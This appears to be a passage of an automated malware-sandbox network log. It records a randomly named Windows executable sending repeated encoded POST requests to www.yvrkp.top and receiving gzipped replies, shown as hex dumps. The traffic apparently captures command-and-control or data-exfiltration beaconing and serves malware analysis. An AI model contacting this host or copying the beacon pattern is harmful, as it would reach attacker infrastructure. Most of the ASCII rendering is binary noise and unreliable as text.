                                                                                      Nov 13, 2024 09:27:35.341252089 CET398INHTTP/1.1 200 OK
                                                                                      Server: openresty
                                                                                      Date: Wed, 13 Nov 2024 08:27:35 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 258
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 72 50 3d 39 6b 78 45 59 63 50 4f 30 51 65 33 31 4d 6a 41 46 6e 45 4d 56 50 48 63 6a 6e 57 38 63 6c 68 4a 66 4f 53 56 6e 53 59 63 46 43 52 75 38 50 38 49 31 36 62 6e 70 48 58 30 75 43 70 6a 4a 43 49 4b 68 4d 38 52 58 69 37 36 7a 37 34 6e 7a 38 43 44 33 65 51 35 51 4f 42 6e 34 51 46 54 6f 53 78 46 6b 54 64 6e 37 2b 5a 7a 38 72 63 7a 75 77 77 4f 4f 52 6a 65 6f 31 38 3d 26 32 70 32 68 3d 76 7a 59 54 32 6c 44 68 4a 54 5a 30 51 6c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?rP=9kxEYcPO0Qe31MjAFnEMVPHcjnW8clhJfOSVnSYcFCRu8P8I16bnpHX0uCpjJCIKhM8RXi76z74nz8CD3eQ5QOBn4QFToSxFkTdn7+Zz8rczuwwOORjeo18=&2p2h=vzYT2lDhJTZ0Ql"}</script></head></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      13192.168.2.458983104.21.14.183802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:27:41.032186985 CET777OUTPOST /9jdk/ HTTP/1.1
                                                                                      Host: www.yvrkp.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.yvrkp.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 199
                                                                                      Referer: http://www.yvrkp.top/9jdk/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 62 73 7a 54 77 38 42 4b 32 62 47 4d 55 4a 4a 34 77 6e 58 7a 6b 48 6c 42 68 75 2b 52 53 78 30 35 43 67 4b 56 31 35 4e 46 31 38 44 72 75 4f 57 44 2b 67 50 49 48 69 2b 56 52 61 66 52 78 54 45 57 73 36 57 74 59 77 64 73 56 70 72 66 52 63 6a 78 6f 63 4d 30 63 31 77 37 56 74 62 59 50 4f 57 4c 65 64 6a 54 77 38 43 73 6c 50 70 62 4f 58 32 45 78 6a 41 42 69 52 58 39 2f 6f 59 56 62 7a 79 35 58 42 65 45 75 2b 2b 37 58 7a 63 2f 2b 57 4c 2f 76 76 67 48 44 47 68 48 4b 4a 53 67 54 70 71 74 38 6b 72 48 57 75 4c 4c 4f 53 47 38 30 68 63 63 64 35 69 38 55 4e 63 6b 54 75 56 6a 6b 64 55 47 79 51 3d 3d
                                                                                      Data Ascii: rP=bszTw8BK2bGMUJJ4wnXzkHlBhu+RSx05CgKV15NF18DruOWD+gPIHi+VRafRxTEWs6WtYwdsVprfRcjxocM0c1w7VtbYPOWLedjTw8CslPpbOX2ExjABiRX9/oYVbzy5XBeEu++7Xzc/+WL/vvgHDGhHKJSgTpqt8krHWuLLOSG80hccd5i8UNckTuVjkdUGyQ==
                                                                                      Nov 13, 2024 09:27:42.064431906 CET1236INHTTP/1.1 200 OK
                                                                                      Date: Wed, 13 Nov 2024 08:27:41 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Cache-Control: private
                                                                                      X-AspNet-Version: 4.0.30319
                                                                                      X-Powered-By: ASP.NET
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Headers: Content-Type, needToken,method, Authorization
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1RYy4foJM%2BQnLI3%2F6Rx%2BzgVVissFfgMbOGmNQGJ%2FxpMtCEkNRniJKQEpbKBjeG1GOil0uokiP6E6ljNoyCCaIz%2B8HYIQjnH3DV1TKqmIvxKmBI5%2FRaZsGCNHsujmNj2m"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e1d62508a592d3b-DFW
                                                                                      Content-Encoding: gzip
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1407&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=777&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 35 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 4d 6f db 46 10 3d db 80 ff c3 86 41 91 04 e8 8a b2 1c 37 09 23 19 4d 1d bb 4d 3f f2 81 d8 45 7b 32 46 e4 48 5c 6b b9 cb ec 2e 29 cb 41 80 1e 0b 14 3d e4 92 a2 40 7a 68 0f 3d f5 da 5b d1 7f 13 03 f9 17 c5 92 94 bc 94 28 db 45 9c 56 17 92 b3 fb de cc be 99 9d 25 d5 bd 72 ff d1 f6 de b7 8f 77 48 6c 12 be b5 b6 da b5 57 12 72 d0 ba e7 1d 6a 12 6a 0d 82 25 60 98 14 da db 5a 5b 5d e9 c6 08 91 9d 99 a0 01 12 1b 93 52 7c 96 b1 bc e7 6d 4b 61 50 18 ba 37 49 d1 23 61 f9 d4 f3 0c 1e 19 df d2 de 25 61 0c 4a a3 e9 ed ef ed d2 db 96 8d 90 45 9a 6f e8 fe 3d ba 2d 93 14 0c eb 73 97 e9 c1 4e 0f a3 21 ba 40 01 09 f6 bc 08 75 a8 58 6a 83 74 a6 2f ce 1b e1 64 2c 55 a4 cf 9c 94 33 1c a7 52 19 67 d2 98
                                                                                      Data Ascii: 57bXMoF=A7#MM?E{2FH\k.)A=@zh=[(EV%rwHlWrjj%`Z[]R|mKaP7I#a%aJEo=-sN!@uXjt/d,U3Rg
                                                                                      Nov 13, 2024 09:27:42.064449072 CET1163INData Raw: 45 26 ee 45 98 b3 10 69 f1 f0 21 61 82 19 06 9c ea 10 38 f6 d6 2b 1e c3 0c c7 ad 4f bf fe 7c ef 93 9d a7 7b 5d bf 7c 5e 5b 9d 77 a2 50 44 a8 50 b9 4e b0 3f 62 c6 ab 4d ae c9 0b 61 8c d4 8a ac 24 77 70 42 52 cd 0c 42 9a 2e ae 25 91 7d c6 91 8e b1
                                                                                      Data Ascii: E&Ei!a8+O|{]|^[wPDPN?bMa$wpBRB.%}O!Mi)%4H/V0}PTI!]KoV%x(cQa:[pw{s/l|?Vtq|Em:p&FD!yj:F41
                                                                                      Nov 13, 2024 09:27:42.272655010 CET1236INData Raw: 36 38 31 0d 0a dc 5b db 52 14 47 18 be b7 ca 77 98 5a cf 24 c3 4c f7 9c 17 c3 4d 2e 72 15 af c8 95 65 51 b3 3d bd 61 75 61 b7 f6 60 e1 45 aa 38 28 a2 15 82 01 d4 b8 42 14 25 11 cb 80 91 c2 35 c4 03 2f 93 39 ec 55 5e 21 d5 33 d3 b3 3d cb 2a c8 88
                                                                                      Data Ascii: 681[RGwZ$LM.reQ=aua`E8(B%5/9U^!3=*gu{r|+CT1g+e:}2n,xke`~4R7zV=M=<a3Y#<>'QbP{"X-tD ,DHBHD00(;O68?'
                                                                                      Nov 13, 2024 09:27:42.272710085 CET436INData Raw: d4 92 b7 f1 e6 90 5a 88 6e 74 de 42 34 45 96 34 19 4a 5a 22 24 1a b7 b7 9d 07 57 ed f5 ba bb b0 ea 2c 3d 4f 12 cb 3b 68 1b 9a aa 28 9d 47 04 40 19 2a 40 4d 88 88 77 eb 0f 6f f2 6d 63 ac e6 2e ac 7a 53 0f f7 09 87 ba 2b 1c 07 6c 21 52 17 58 88 64
                                                                                      Data Ascii: ZntB4E4JZ"$W,=O;h(G@*@Mwomc.zS+l!RXd0d?K[y]_)P,y`nh~-?v35jdHHh${zxulE9YX]~WAt(CYomWLtJ
                                                                                      Nov 13, 2024 09:27:42.482034922 CET1236INData Raw: 62 61 33 0d 0a ec 5d ed 4f 1b 47 1a ff dc 4a fd 1f a6 6e af b6 95 f8 05 bf 80 ed 80 a5 f4 aa e8 aa eb 87 93 f2 e1 3e 44 51 65 f0 62 ef dd e2 b5 bc 76 68 da 44 82 10 07 db 40 8c 8f d7 80 c3 4b 02 84 94 c4 31 2f c5 8e c1 20 f5 6f f1 ec cb a7 fc 0b
                                                                                      Data Ascii: ba3]OGJn>DQebvhD@K1/ o]wi(^vy36KuP$VPs0C|=m_S1|-+m1_Wm55=A3yd"7KpWZ<x/Be1uH2#TV2I>,J?$Sftf`J
                                                                                      Nov 13, 2024 09:27:42.482060909 CET1236INData Raw: 69 14 16 df b5 9a af d9 dc c1 ff 07 2c f5 62 7a 85 5a 36 86 0c 65 f8 8a ae 7d ad ae 8b d8 46 83 34 9d 96 19 8c 4c 0f d4 22 1d ce fe 08 fd 63 3c 92 d0 50 43 9d 49 f2 25 9f 9a 94 0f 72 07 8c 38 ae 3a ce 54 82 b3 19 a7 a4 73 7e 38 49 7d 32 3c 1a 3d
                                                                                      Data Ascii: i,bzZ6e}F4L"c<PCI%r8:Ts~8I}2<=7[:J5BqMuLkL<rN|7HMa0!ifP:!Y,[+;:.#q?:Y"qrH_9%Lc, ,A (v#Q h[LHD'
                                                                                      Nov 13, 2024 09:27:42.482078075 CET424INData Raw: 9e fc cc 3d 7d a7 ee 10 f4 c3 0c d1 74 3a fe 37 69 f9 69 60 00 6c ce 48 a5 c3 e5 13 2e 3f ce be 9b 6d 9d 4c b4 ea 53 ad fa 08 bb 56 63 17 0e db ca 5c 2e 60 41 c5 5b 42 80 cb 1d 72 bb 47 fc f8 cf b0 b0 2d 8c 3c 82 8d 59 9c 5d d8 59 84 8d 2d 6d 16
                                                                                      Data Ascii: =}t:7ii`lH.?mLSVc\.`A[BrG-<Y]Y-m<@>xkyZV-=f#"xR8Z+zC9L:JD{1V&DH<&pcpKq?OzGI6wv !wu1hai]8zXRm_;2id4v35Yg
                                                                                      Nov 13, 2024 09:27:42.482090950 CET112INData Raw: 62 2c 2a 3f 79 fd 4c 5d 5d 58 de 44 99 d7 f3 c7 94 9d 69 99 57 6f 19 b8 db c6 a3 9a 6c fd 37 57 78 6d f7 24 2e e8 3e 41 7e 49 47 0a 6d 77 8a e4 8a 3a 41 ad a4 44 81 6c 77 a6 e9 58 8c 22 6c 56 86 a2 87 ad 76 f0 d0 2e 52 f1 8a 1f 6a bb c4 6f c3 0a
                                                                                      Data Ascii: b,*?yL]]XDiWol7Wxm$.>A~IGmw:ADlwX"lVv.Rjoc!x~k0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      14192.168.2.458999104.21.14.183802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:27:43.567522049 CET797OUTPOST /9jdk/ HTTP/1.1
                                                                                      Host: www.yvrkp.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.yvrkp.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 219
                                                                                      Referer: http://www.yvrkp.top/9jdk/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 62 73 7a 54 77 38 42 4b 32 62 47 4d 55 70 35 34 31 41 44 7a 7a 33 6c 41 71 4f 2b 52 5a 52 30 39 43 67 47 56 31 38 30 43 31 76 6e 72 75 75 6d 44 2f 6c 6a 49 43 69 2b 56 65 36 66 55 38 7a 45 5a 73 36 62 48 59 30 64 73 56 70 50 66 52 65 72 78 6f 74 4d 31 4e 31 77 35 64 4e 62 61 4c 4f 57 4c 65 64 6a 54 77 38 47 4b 6c 50 68 62 53 32 47 45 77 42 34 47 68 52 58 79 72 34 59 56 4b 6a 79 39 58 42 66 6e 75 2f 54 55 58 31 51 2f 2b 55 44 2f 76 62 38 47 4a 47 68 42 4f 4a 54 2b 62 62 33 66 6c 47 4b 58 4a 4d 6e 70 50 68 69 2b 31 6e 52 47 4d 49 44 72 47 4e 34 58 4f 70 63 58 70 65 70 50 70 64 6a 64 62 6b 2f 57 6e 50 39 6f 43 6c 55 53 68 4f 71 34 79 49 34 3d
                                                                                      Data Ascii: rP=bszTw8BK2bGMUp541ADzz3lAqO+RZR09CgGV180C1vnruumD/ljICi+Ve6fU8zEZs6bHY0dsVpPfRerxotM1N1w5dNbaLOWLedjTw8GKlPhbS2GEwB4GhRXyr4YVKjy9XBfnu/TUX1Q/+UD/vb8GJGhBOJT+bb3flGKXJMnpPhi+1nRGMIDrGN4XOpcXpepPpdjdbk/WnP9oClUShOq4yI4=
                                                                                      Nov 13, 2024 09:27:44.597100019 CET1236INHTTP/1.1 200 OK
                                                                                      Date: Wed, 13 Nov 2024 08:27:44 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Cache-Control: private
                                                                                      X-AspNet-Version: 4.0.30319
                                                                                      X-Powered-By: ASP.NET
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Headers: Content-Type, needToken,method, Authorization
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JfWjV8s5g%2B7cHRVRAEjk%2FBEYFbUYckCjtaB6jFGgogQeFAU52%2FFyJhoqDpvH7xF%2FmmlfvgNChcivvM0Jj%2FVWCd2p%2Ffyzr9ofOB2uj49UDLcIDsaU4BwCTwCwFDgAP7MZ"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e1d62607ad5467e-DFW
                                                                                      Content-Encoding: gzip
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1179&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=797&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 35 37 31 0d 0a c4 58 4d 6f db 46 10 3d db 80 ff c3 86 41 91 04 e8 8a b2 1c 37 09 23 19 4d 1d bb 4d 3f f2 81 d8 45 7b 32 46 e4 48 5c 6b b9 cb ec 2e 29 cb 41 80 1e 0b 14 3d e4 92 a2 40 7a 68 0f 3d f5 da 5b d1 7f 13 03 f9 17 c5 92 94 bc 94 28 db 45 9c 56 17 92 b3 fb de cc be 99 9d 25 d5 bd 72 ff d1 f6 de b7 8f 77 48 6c 12 be b5 b6 da b5 57 12 72 d0 ba e7 1d 6a 12 6a 0d 82 25 60 98 14 da db 5a 5b 5d e9 c6 08 91 9d 99 a0 01 12 1b 93 52 7c 96 b1 bc e7 6d 4b 61 50 18 ba 37 49 d1 23 61 f9 d4 f3 0c 1e 19 df d2 de 25 61 0c 4a a3 e9 ed ef ed d2 db 96 8d 90 45 9a 6f e8 fe 3d ba 2d 93 14 0c eb 73 97 e9 c1 4e 0f a3 21 ba 40 01 09 f6 bc 08 75 a8 58 6a 83 74 a6 2f ce 1b e1 64 2c 55 a4 cf
                                                                                      Data Ascii: f571XMoF=A7#MM?E{2FH\k.)A=@zh=[(EV%rwHlWrjj%`Z[]R|mKaP7I#a%aJEo=-sN!@uXjt/d,U
                                                                                      Nov 13, 2024 09:27:44.597152948 CET1173INData Raw: 9c 94 33 1c a7 52 19 67 d2 98 45 26 ee 45 98 b3 10 69 f1 f0 21 61 82 19 06 9c ea 10 38 f6 d6 2b 1e c3 0c c7 ad 4f bf fe 7c ef 93 9d a7 7b 5d bf 7c 5e 5b 9d 77 a2 50 44 a8 50 b9 4e b0 3f 62 c6 ab 4d ae c9 0b 61 8c d4 8a ac 24 77 70 42 52 cd 0c 42
                                                                                      Data Ascii: 3RgE&Ei!a8+O|{]|^[wPDPN?bMa$wpBRB.%}O!Mi)%4H/V0}PTI!]KoV%x(cQa:[pw{s/l|?Vtq|Em:p&FD!y
                                                                                      Nov 13, 2024 09:27:44.792308092 CET1236INData Raw: 36 62 61 0d 0a dc 5b 49 73 d3 48 14 be 53 c5 7f 70 99 3d 33 8a bb 25 b5 16 87 f1 65 0e 73 1a 4e 99 13 45 a5 64 b5 4c 0c 76 ec f2 42 85 03 55 61 09 84 65 26 14 04 48 9c 00 13 1c 88 a7 82 4d 08 24 66 c9 f2 67 d0 e2 d3 fc 85 29 49 dd b2 e4 18 08 31
                                                                                      Data Ascii: 6ba[IsHSp=3%esNEdLvBUae&HM$fg)I1[{;XY}cxYs.cjSu~zzYL=VxQ&#)W&4n{(.cU%Ub1VUy,a,bv!5164
                                                                                      Nov 13, 2024 09:27:44.792363882 CET493INData Raw: b9 2a 0e 76 c9 55 21 ea aa 10 44 3c 87 44 51 10 f9 fe b3 c9 c4 ae 11 b1 b6 ea 9f 36 fe d6 9f 3f b2 ca 8f f5 89 7a 6f ba 2a 49 e0 bb 84 07 a4 78 40 28 20 80 9c 85 d2 d1 0a 21 78 2c 4f 1a b7 ee eb 0b 9b 3d 89 87 63 94 5d f7 58 02 10 78 5e 42 10 74
                                                                                      Data Ascii: *vU!D<DQ6?zo*Ix@( !x,O=c]Xx^Btw7f^[[OU3Z `a9;BgikOM}}R_i/yPj1Vo/E-<c,OYo+9n\$"8Y0q{g?-
                                                                                      Nov 13, 2024 09:27:44.987910986 CET1236INData Raw: 61 66 63 0d 0a ec 5d eb 4f db c8 16 ff bc 2b ed ff 30 eb ee 6d 12 b5 79 d4 49 78 a4 10 a9 7b 57 d5 5d 69 3f 5c a9 1f ee 87 aa 5a 05 62 12 df 6b e2 28 76 a0 4f 09 da 42 80 02 a1 25 3c 04 b4 34 2d 6d a1 94 c7 b2 2c 8f 24 80 74 ff 95 cd f8 f1 a9 ff
                                                                                      Data Ascii: afc]O+0myIx{W]i?\Zbk(vOB%<4-m,$tdlRx93s|f_l/pjNAz9VkNb$bdz^6k.]10oL;bzl*5S*JOqeO28MH:`~DtizOs
                                                                                      Nov 13, 2024 09:27:44.987951040 CET1236INData Raw: ed 10 fd 78 bb f9 bb de 0e fe 36 12 0b c3 57 d5 52 e5 cd 93 f3 47 04 b5 79 b1 62 83 99 84 c2 87 e4 f6 c8 62 11 70 81 09 a3 df e3 14 2d e0 ac 69 0d 30 5e be ae 86 d6 8e 19 07 13 af b0 6d 33 3a 90 9e bd 0c 86 88 f6 a5 5a ca 73 c0 49 44 8e 05 f7 fe
                                                                                      Data Ascii: x6WRGybbp-i0^m3:ZsID/PGCZ[[~U+,W$%&Ix@pnOoHX'eHHO}7YFGED@6&4`$/<|2LaFLhO)1\5)%CFDm
                                                                                      Nov 13, 2024 09:27:44.987987041 CET369INData Raw: 40 2f 45 0a 40 4e bd 16 52 9e 44 ee a4 d3 18 6b e2 37 8c b1 51 f1 46 9a 61 e2 11 10 0e 04 2c e2 74 0b ba d2 a8 33 db ea 5c 41 9a d9 51 67 b6 6d 66 58 67 d0 64 53 5f 57 76 8d 4b df a2 69 90 d1 97 c4 fc c0 60 77 a4 b1 a2 fa 76 5a fa 50 94 86 df a1
                                                                                      Data Ascii: @/E@NRDk7QFa,t3\AQgmfXgdS_WvKi`wvZPztwEBEc8wEG3&N@hdQB}X^pYLG6^\SG#)}3( YO5e#$6TGd9Z=#0BB*


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      15192.168.2.459009104.21.14.183802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:27:46.113253117 CET10879OUTPOST /9jdk/ HTTP/1.1
                                                                                      Host: www.yvrkp.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.yvrkp.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 10299
                                                                                      Referer: http://www.yvrkp.top/9jdk/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 62 73 7a 54 77 38 42 4b 32 62 47 4d 55 70 35 34 31 41 44 7a 7a 33 6c 41 71 4f 2b 52 5a 52 30 39 43 67 47 56 31 38 30 43 31 76 76 72 76 64 75 44 2b 43 33 49 46 69 2b 56 58 61 66 56 38 7a 45 2b 73 36 44 44 59 31 68 57 56 72 6e 66 54 37 2f 78 75 66 6b 31 45 31 77 35 52 74 62 5a 50 4f 57 65 65 64 7a 66 77 38 32 4b 6c 50 68 62 53 31 65 45 6d 6a 41 47 74 78 58 39 2f 6f 59 6a 62 7a 79 46 58 42 48 5a 75 2f 6d 72 58 6c 77 2f 2f 30 7a 2f 74 4f 67 47 46 47 68 44 41 70 54 32 62 62 37 45 6c 47 6d 62 4a 49 6e 54 50 69 2b 2b 30 68 4a 62 57 61 50 30 5a 76 6f 54 56 37 41 64 6e 76 46 55 6e 74 6e 31 66 31 75 50 7a 73 5a 71 41 30 6c 5a 77 36 57 76 71 76 67 47 38 6b 36 63 32 49 54 30 77 55 71 6d 2f 6a 6f 76 37 6c 75 70 45 34 4f 39 4f 65 50 58 35 4b 72 5a 4e 4e 48 6b 4b 7a 33 50 6d 64 69 71 79 73 6d 70 34 6f 6d 4b 7a 48 32 47 6d 6f 62 72 4a 67 76 57 42 38 2b 73 69 71 68 41 78 51 52 79 30 4d 38 72 34 36 45 78 50 4d 38 66 64 47 55 4d 77 49 76 65 4f 54 58 39 6f 2b 61 68 62 6c 53 79 55 56 43 62 37 74 51 59 7a 36 54 [TRUNCATED]
                                                                                      Data Ascii: rP=bszTw8BK2bGMUp541ADzz3lAqO+RZR09CgGV180C1vvrvduD+C3IFi+VXafV8zE+s6DDY1hWVrnfT7/xufk1E1w5RtbZPOWeedzfw82KlPhbS1eEmjAGtxX9/oYjbzyFXBHZu/mrXlw//0z/tOgGFGhDApT2bb7ElGmbJInTPi++0hJbWaP0ZvoTV7AdnvFUntn1f1uPzsZqA0lZw6WvqvgG8k6c2IT0wUqm/jov7lupE4O9OePX5KrZNNHkKz3Pmdiqysmp4omKzH2GmobrJgvWB8+siqhAxQRy0M8r46ExPM8fdGUMwIveOTX9o+ahblSyUVCb7tQYz6TMgQRgpBU0PDVzJrJIeWWOfZs9JVyolUHKJezSYUA956sBG6RZ8MmJrsPsizBaG8LAaln5S0ifBBPyq4VBeYMr57EvVKIpWdzLMhzTFgMVjm1nwIFYGJle77MwRX/HVeeBUZmhmNag6rAvCCywVEI6AAWsi+TQb579kOkAGzb+8TovB83JHBFqchtgBoYUGNqLy/hglp2dGWL9CaiKLw8lMucdPbFi5UANqYCAtsso6zjvFDXQVXj6V+l+ism/9ZcgKGyV4FZqWS2ORifjYUbA2JKwYyn/3YYBUw4KVkGRrXm53e4f80TVEJh2yl3+/LyRrM6IgcmQlS48gwAx8L0HpmlmpVCL5Mv1j8h5p2MxDYp53gEgMxokaCHeMu8nYXKpo4sfQk2sDXRFAqtDpyuOoPGT1THhaR4HlBLhI0DmrONV99YITaB6nm0VGRtJVbx0m9bddujXo5jweYKBHQlmZUNEme9irq9bD0y7AX8gJxi7BXAjWvKjmtSxg7wvdYp9r0kTTxHeUd26J83Tu56DcyLDv5ZVGJRNdBFYHC4VLFQd7dwCT/xVxf9TOmWviv+Kc91468/rXERs5jYca9AySSazFKiauybnnz0mculgLGpNdpFoM39HampT6JnaGeMh0xYywrA7f9ouErtcT2bLkpHW6bDiTl3fa [TRUNCATED]
                                                                                      Nov 13, 2024 09:27:47.160398960 CET1010INHTTP/1.1 200 OK
                                                                                      Date: Wed, 13 Nov 2024 08:27:47 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Cache-Control: private
                                                                                      X-AspNet-Version: 4.0.30319
                                                                                      X-Powered-By: ASP.NET
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Headers: Content-Type, needToken,method, Authorization
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5QUagc1ARxq%2BvBhqdi3RVUZyUrKzPVsdSVzsrfvgVuyt%2BSGV46SaaiVYzB%2FozHQKRQalQSSAqqd2L43xV1Hiifd6deNC4zgnfdXNKHbsJoQQ%2BSnKZnQXfs%2BfJ4YUlpvu"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e1d62706ee98787-DFW
                                                                                      Content-Encoding: gzip
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1235&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10879&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                                      Data Ascii: f
                                                                                      Nov 13, 2024 09:27:47.160418034 CET1236INData Raw: 35 37 31 0d 0a c4 58 4d 6f db 46 10 3d db 80 ff c3 86 41 91 04 e8 8a b2 1c 37 09 23 19 4d 1d bb 4d 3f f2 81 d8 45 7b 32 46 e4 48 5c 6b b9 cb ec 2e 29 cb 41 80 1e 0b 14 3d e4 92 a2 40 7a 68 0f 3d f5 da 5b d1 7f 13 03 f9 17 c5 92 94 bc 94 28 db 45
                                                                                      Data Ascii: 571XMoF=A7#MM?E{2FH\k.)A=@zh=[(EV%rwHlWrjj%`Z[]R|mKaP7I#a%aJEo=-sN!@uXjt/d,U3RgE&E
                                                                                      Nov 13, 2024 09:27:47.160509109 CET164INData Raw: 21 45 81 56 df be 01 d9 b0 5b b0 71 11 4d 29 bb c0 ea ec 89 e0 6d bd fd fd d5 db 5f ff 6c 4e bb 0f b5 dc d5 b4 3f 33 27 e7 c8 6a b3 41 58 d4 bb 36 6b 3f 45 15 5e 7b df 19 f2 1a 75 2f 82 c8 f4 ff 20 fd 4f af 4f 5e fd 75 f2 fd cb 37 df bd 5c 92 80
                                                                                      Data Ascii: !EV[qM)m_lN?3'jAX6k?E^{u/ OO^u7\&c4^[]YY]lNO'e+P$?_8
                                                                                      Nov 13, 2024 09:27:47.350872993 CET1236INData Raw: 36 62 33 0d 0a dc 5b 5b 53 13 49 14 7e b7 ca ff 30 15 d7 1b bb c3 74 f7 dc 83 9b 97 7d d8 a7 dd 27 f6 c9 b2 52 93 b9 2c d1 40 52 b9 58 f8 60 15 17 6b 15 29 17 56 91 4b 40 a9 90 a0 58 18 44 50 11 e4 f2 67 9c 4b 9e f6 2f 6c cd a5 27 33 21 2a 12 31
                                                                                      Data Ascii: 6b3[[SI~0t}'R,@RX`k)VK@XDPgK/l'3!*1ds;;CC1u`VVw,6Q:}X9f!nV-5_JuR3I\QL6We9QXhh*i*kh(j&h@c&i;L<.kqgx<
